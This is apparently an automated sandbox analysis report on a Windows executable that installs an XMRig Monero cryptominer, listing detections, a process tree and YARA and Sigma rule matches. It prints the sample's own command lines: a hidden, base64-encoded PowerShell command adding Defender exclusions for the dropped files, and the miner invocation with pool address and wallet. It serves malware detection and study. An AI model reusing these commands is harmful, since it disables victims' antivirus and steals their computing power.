Edit tour

Windows Analysis Report
o9OIGsDt4m.exe

Overview

General Information

Sample name:	o9OIGsDt4m.exe
Analysis ID:	1513634
MD5:	fd3ad0ae7fe1bbee4b2f2bd43a359393
SHA1:	60ae0666da4a38f4881511149ce3be848844b9fd
SHA256:	7bffd9cb271221c63b35a30160859ec4f2ff2ba131597d1f746c279fb53d1ad7
Tags:	exe
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Xmrig

Yara detected Xmrig cryptocurrency miner

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Bypasses PowerShell execution policy

Detected Stratum mining protocol

Encrypted powershell cmdline option found

Found strings related to Crypto-Mining

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sigma detected: Potential Crypto Mining Activity

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected PersistenceViaHiddenTask

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Network Connection Initiated By AddinUtil.EXE

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Uncommon Child Process Of AddinUtil.EXE

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

o9OIGsDt4m.exe (PID: 6380 cmdline: "C:\Users\user\Desktop\o9OIGsDt4m.exe" MD5: FD3AD0AE7FE1BBEE4B2F2BD43A359393)

powershell.exe (PID: 2300 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 3924 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

Current.exe (PID: 7104 cmdline: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe MD5: FD3AD0AE7FE1BBEE4B2F2BD43A359393)

AddInUtil.exe (PID: 6044 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe MD5: 11BED2C86507F7DF04BA52CFC7EB7276)

AddInProcess.exe (PID: 5808 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)

Current.exe (PID: 2584 cmdline: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe MD5: FD3AD0AE7FE1BBEE4B2F2BD43A359393)

svchost.exe (PID: 2172 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2691830149.000001F95F1C2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2129713710.000001FA0B160000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.4581896540.0000023F78A26000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000000.00000002.2132804685.000001FA1D125000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x465c8:$a1: mining.set_target 0x410a0:$a2: XMRIG_HOSTNAME 0x43170:$a3: Usage: xmrig [OPTIONS] 0x41078:$a4: XMRIG_VERSION
00000009.00000002.2696904592.000001F96F405000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.2691830149.000001F95F0B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.4560506841.0000000140799000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000000.00000002.2130103490.000001FA0CE27000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000000.00000002.2130103490.000001FA0CBF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2181255354.00000226C1815000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.4570473066.0000023C545E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2132804685.000001FA1CEF5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2181255354.00000226C15E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x468d8:$a1: mining.set_target 0x413b0:$a2: XMRIG_HOSTNAME 0x43480:$a3: Usage: xmrig [OPTIONS] 0x41388:$a4: XMRIG_VERSION
00000004.00000002.2167540557.00000226B12E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.2696904592.000001F96F5E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.2696904592.000001F96F201000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2181255354.00000226C1431000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.2696904592.000001F96F3B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.4581896540.0000023F789F8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000005.00000002.4614043790.0000023C653B6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000002.4560506841.0000000140000000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: o9OIGsDt4m.exe PID: 6380	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: o9OIGsDt4m.exe PID: 6380	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Current.exe PID: 7104	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: Current.exe PID: 7104	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: AddInUtil.exe PID: 6044	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: AddInUtil.exe PID: 6044	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: AddInUtil.exe PID: 6044	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0xdf35:$a1: mining.set_target 0x9df3:$a2: XMRIG_HOSTNAME 0xb10f:$a3: Usage: xmrig [OPTIONS] 0x9dd4:$a4: XMRIG_VERSION
Process Memory Space: AddInProcess.exe PID: 5808	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: AddInProcess.exe PID: 5808	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x90643:$a1: mining.set_target 0x8c501:$a2: XMRIG_HOSTNAME 0x8d81d:$a3: Usage: xmrig [OPTIONS] 0x8c4e2:$a4: XMRIG_VERSION
Process Memory Space: Current.exe PID: 2584	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.Current.exe.1f96f3b5b38.7.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.Current.exe.226c14319e0.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.o9OIGsDt4m.exe.1fa0b160000.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.Current.exe.226c1635b70.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.Current.exe.226c1815be0.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.Current.exe.1f96f5e5be0.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.Current.exe.1f96f2019e0.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.o9OIGsDt4m.exe.1fa1d125be0.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.o9OIGsDt4m.exe.1fa1cf44d98.7.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.Current.exe.1f96f405b70.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.Current.exe.1f96f3b5b38.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.Current.exe.226c15e5b38.9.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.Current.exe.226c15e5b38.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.o9OIGsDt4m.exe.1fa1d1c5c18.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.o9OIGsDt4m.exe.1fa1cf6cdd0.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.o9OIGsDt4m.exe.1fa1cf44d98.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.2.AddInUtil.exe.23c653b70f0.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
5.2.AddInUtil.exe.23c653b70f0.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4a90d8:$a1: mining.set_target 0x4a3bb0:$a2: XMRIG_HOSTNAME 0x4a5c80:$a3: Usage: xmrig [OPTIONS] 0x4a3b88:$a4: XMRIG_VERSION
5.2.AddInUtil.exe.23c653b70f0.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4afba0:$x1: donate.ssl.xmrig.com 0x4b0071:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
5.2.AddInUtil.exe.23c653b70f0.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4b0580:$s1: %s/%s (Windows NT %lu.%lu 0x4b16b0:$s3: \\.\WinRing0_ 0x4a7e78:$s4: pool_wallet 0x4a3428:$s5: cryptonight 0x4a3438:$s5: cryptonight 0x4a3448:$s5: cryptonight 0x4a3458:$s5: cryptonight 0x4a3470:$s5: cryptonight 0x4a3480:$s5: cryptonight 0x4a3490:$s5: cryptonight 0x4a34a8:$s5: cryptonight 0x4a34b8:$s5: cryptonight 0x4a34d0:$s5: cryptonight 0x4a34e8:$s5: cryptonight 0x4a34f8:$s5: cryptonight 0x4a3508:$s5: cryptonight 0x4a3518:$s5: cryptonight 0x4a3530:$s5: cryptonight 0x4a3548:$s5: cryptonight 0x4a3558:$s5: cryptonight 0x4a3568:$s5: cryptonight
5.2.AddInUtil.exe.23c653b70f0.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
8.2.AddInProcess.exe.140000000.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
8.2.AddInProcess.exe.140000000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
8.2.AddInProcess.exe.140000000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4aa4d8:$a1: mining.set_target 0x4a4fb0:$a2: XMRIG_HOSTNAME 0x4a7080:$a3: Usage: xmrig [OPTIONS] 0x4a4f88:$a4: XMRIG_VERSION
8.2.AddInProcess.exe.140000000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4b0fa0:$x1: donate.ssl.xmrig.com 0x4b1471:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
8.2.AddInProcess.exe.140000000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4b1980:$s1: %s/%s (Windows NT %lu.%lu 0x4b2ab0:$s3: \\.\WinRing0_ 0x4a9278:$s4: pool_wallet 0x4a4828:$s5: cryptonight 0x4a4838:$s5: cryptonight 0x4a4848:$s5: cryptonight 0x4a4858:$s5: cryptonight 0x4a4870:$s5: cryptonight 0x4a4880:$s5: cryptonight 0x4a4890:$s5: cryptonight 0x4a48a8:$s5: cryptonight 0x4a48b8:$s5: cryptonight 0x4a48d0:$s5: cryptonight 0x4a48e8:$s5: cryptonight 0x4a48f8:$s5: cryptonight 0x4a4908:$s5: cryptonight 0x4a4918:$s5: cryptonight 0x4a4930:$s5: cryptonight 0x4a4948:$s5: cryptonight 0x4a4958:$s5: cryptonight 0x4a4968:$s5: cryptonight
Click to see the 21 entries

Sigma Signatures

Bitcoin Miner

Sigma detected: Xmrig

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe, ParentProcessId: 6044, ParentProcessName: AddInUtil.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, ProcessId: 5808, ProcessName: AddInProcess.exe

System Summary

Sigma detected: Potential Crypto Mining Activity

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe, ParentProcessId: 6044, ParentProcessName: AddInUtil.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, ProcessId: 5808, ProcessName: AddInProcess.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAF

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

